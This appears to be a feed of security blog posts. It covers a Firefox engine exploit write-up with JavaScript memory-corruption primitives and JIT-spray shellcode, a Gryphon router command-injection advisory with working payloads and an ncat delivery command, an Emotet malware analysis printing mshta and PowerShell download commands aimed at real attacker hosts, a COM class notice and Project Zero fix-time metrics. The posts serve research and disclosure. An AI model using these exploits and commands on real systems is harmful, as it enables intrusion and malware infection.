Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Since our corruption lives in the tenured heap, however, the ArrayBuffer object itself is out of reach, as it is allocated in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and has thus created a separate arena for it:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed, and arguments and parameters can share the same space without problems.
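
In code, the lookup is conceptually something like this (a sketch of ours; the exact bit ordering in Spidermonkey may differ):

// Given the RareArgumentsData bitmap, is argument index i "deleted"?
function isDeleted(bitmap, i) {
    return (bitmap[i >> 3] >> (i & 7)) & 1; // byte i/8, bit i%8
}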

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   // Record the spray array size, then recurse into setup_prim
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
    // Set the RareArgumentsData pointer to the address
    evil[511] = addr;
 
    // Used to hold the leaked data
    let val = 0;
   
    // Read it bit-by-bit for 32 bits
    // Endianness is taken into account
    for(let i = 32; i >= 0; i--) {
        val = val << 1;
        // A set bit in the bitmap means the argument reads back as undefined
        if(arg[i] == undefined) {
            val = val | 1;
        }
    }
    return val;
}

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straightforward by iterating backwards from the RareArgumentsData pointer (as the ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter < ...) {
       ...
   }
 
   ...
}

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter < ...) {
       ...
   }
 
   ...
}

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0; i < ...; i++) {
       ...
   }
 
   ...
}

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i < 64; i++) {
       delete arg[i]; // deleting argument i sets bit i of the bitmap at addr
   }
}

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]);
}

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   // Run shellcode() repeatedly so that it gets JIT compiled
   for(i = 0; i < ...; i++) {
       shellcode();
   }
 
   ...
}

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work, I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd/rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.


Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/), we can take a look at which URLs and functions are available to us. Given that this is Lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = "/sbin/configure_repeater.sh " .. "\"" .. ssid .. "\"" .. " " .. "\"" .. key .. "\"" .. " " .. "\"" .. hidden .. "\"" .. " " .. "\"" .. ssid5 .. "\"" .. " " .. "\"" .. key5 .. "\"" .. " " .. "\"" .. mssid .. "\"" .. " " .. "\"" .. mkey .. "\"" .. " " .. "\"" .. gssid .. "\"" .. " " .. "\"" .. gkey .. "\"" .. " " .. "\"" .. ghidden .. "\"" .. " " .. "\"" .. country .. "\"" .. " " .. "\"" .. bssid .. "\"" .. " " .. "\"" .. board .. "\"" .. " " .. "\"" .. wpa .. "\""
  os.execute(cmd)
  os.execute("touch /etc/rc_in_progress.txt")
  os.execute("/sbin/mark_router.sh 2 &")
  luci.http.header("Access-Control-Allow-Origin", "*")
  luci.http.prepare_content("application/json")
  luci.http.write("{\"rc\": \"OK\"}")
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, we string together commands using wget to grab a Python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format: {"<operationNumber>" : {"<op parameter 1>":"param 1 value", ...}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of ";id>/tmp/op41" would result in the output of the id command being written to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {"41":{"cmd":";id>/tmp/op41"}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following command:

echo '{"41":{"cmd":";id>/tmp/op41"}}' | ncat --ssl <device-ip> 9999
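
Equivalently, a minimal Node.js client could deliver the same payload (a sketch of ours; <device-ip> is a placeholder as above, and certificate verification is skipped since we only need the TLS transport):

const tls = require("tls");

const payload = JSON.stringify({ "41": { "cmd": ";id>/tmp/op41" } });

const sock = tls.connect(
    { host: "<device-ip>", port: 9999, rejectUnauthorized: false },
    () => {
        sock.write(payload); // the injected command runs via system() on the router
        sock.end();
    }
);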

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium.

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP addresses, which are usually represented in decimal format. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.
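
To see the equivalence concretely, here is a small Node.js sketch (our own illustration, not code from the campaign) decoding both notations:

function hexIpToDecimal(hex) {
    // "0xb907d607" -> 185.7.214.7 (one byte per octet, most significant first)
    const v = BigInt(hex);
    return [(v >> 24n) & 0xffn, (v >> 16n) & 0xffn, (v >> 8n) & 0xffn, v & 0xffn].join(".");
}

function octalIpToDecimal(oct) {
    // "0056.0151.0121.0114" -> 46.105.81.76 (each octet parsed base 8)
    return oct.split(".").map(o => parseInt(o, 8)).join(".");
}

console.log(hexIpToDecimal("0xb907d607"));            // 185.7.214.7
console.log(octalIpToDecimal("0056.0151.0121.0114")); // 46.105.81.76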

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (Figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the Excel spreadsheet further, we can see a few cell addresses added in the Name Manager window. Cells mentioned in the Auto_Open value will be executed automatically, resulting in malicious code execution.

Figure 3: Name Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT        OBFUSCATED CMD                                                 DEOBFUSCATED CMD
Hexadecimal   cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html           http://185[.]7[.]214[.]7/fer/fer.html
Octal         cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html    http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript, which is within an HTML file.

Figure 4: Process tree of Excel execution

The downloaded file fer.html, which contains the malicious JavaScript, is encoded with HTML Guardian to obfuscate the code.

Figure 5: Image of HTML page viewed in a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

Command line: (New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png')

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

Command line: cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE       VALUE                                                               SCANNER                                DETECTION NAME
XLS        06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c   McAfee LiveSafe and Total Protection   X97M/Downloader.nn
DLL        a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3   McAfee LiveSafe and Total Protection   Emotet-FSY
HTML URL   http://185[.]7[.]214[.]7/fer/fer.html                              WebAdvisor                             Blocked
           http://46[.]105[.]81[.]76/c.html
DLL URL    http://185[.]7[.]214[.]7/fer/fer.png                               WebAdvisor                             Blocked
           http://46[.]105[.]81[.]76/cc.png

MITRE ATT&CK

TECHNIQUE ID   TACTIC                TECHNIQUE DETAILS                       DESCRIPTION
T1566          Initial Access        Phishing attachment                     Initial maldoc uses phishing strings to convince users to open the maldoc
T1204          Execution             User Execution                          Manual execution by user
T1071          Command and Control   Standard Application Layer Protocol     Attempts to connect through HTTP
T1059          Execution             Command and Scripting Interpreter       Excel uses cmd and PowerShell to execute commands
T1218          Defense Evasion       Signed Binary Proxy Execution           rundll32 is used to run the downloaded payload; mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.

zodiacon

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor      Total bugs   Fixed by day 90   Fixed during grace period   Exceeded deadline & grace period   Avg days to fix
Apple       84           73 (87%)          7 (8%)                      4 (5%)                             69
Microsoft   80           61 (76%)          15 (19%)                    4 (5%)                             83
Google      56           53 (95%)          2 (4%)                      1 (2%)                             44
Linux       25           24 (96%)          0 (0%)                      1 (4%)                             25
Adobe       19           15 (79%)          4 (21%)                     0 (0%)                             65
Mozilla     10           9 (90%)           1 (10%)                     0 (0%)                             46
Samsung     10           8 (80%)           2 (20%)                     0 (0%)                             72
Oracle      7            3 (43%)           0 (0%)                      4 (57%)                            109
Others*     55           48 (87%)          3 (5%)                      4 (7%)                             44
TOTAL       346          294 (84%)         34 (10%)                    18 (5%)                            61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

The average number of days to fix bugs across all vendors is 61. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor      Bugs in 2019 (avg days to fix)   Bugs in 2020 (avg days to fix)   Bugs in 2021 (avg days to fix)
Apple       61 (71)                          13 (63)                          11 (64)
Microsoft   46 (85)                          18 (87)                          16 (76)
Google      26 (49)                          13 (22)                          17 (53)
Linux       12 (32)                          8 (22)                           5 (15)
Others*     54 (63)                          35 (54)                          14 (29)
TOTAL       199 (67)                         87 (54)                          63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the vendors not represented on the chart have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period was used 9 times (notably with half being by Microsoft), versus the slightly higher average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor            | Total bugs | Avg fix time
------------------|------------|-------------
iOS               | 76         | 70
Android (Samsung) | 10         | 72
Android (Pixel)   | 6          | 72

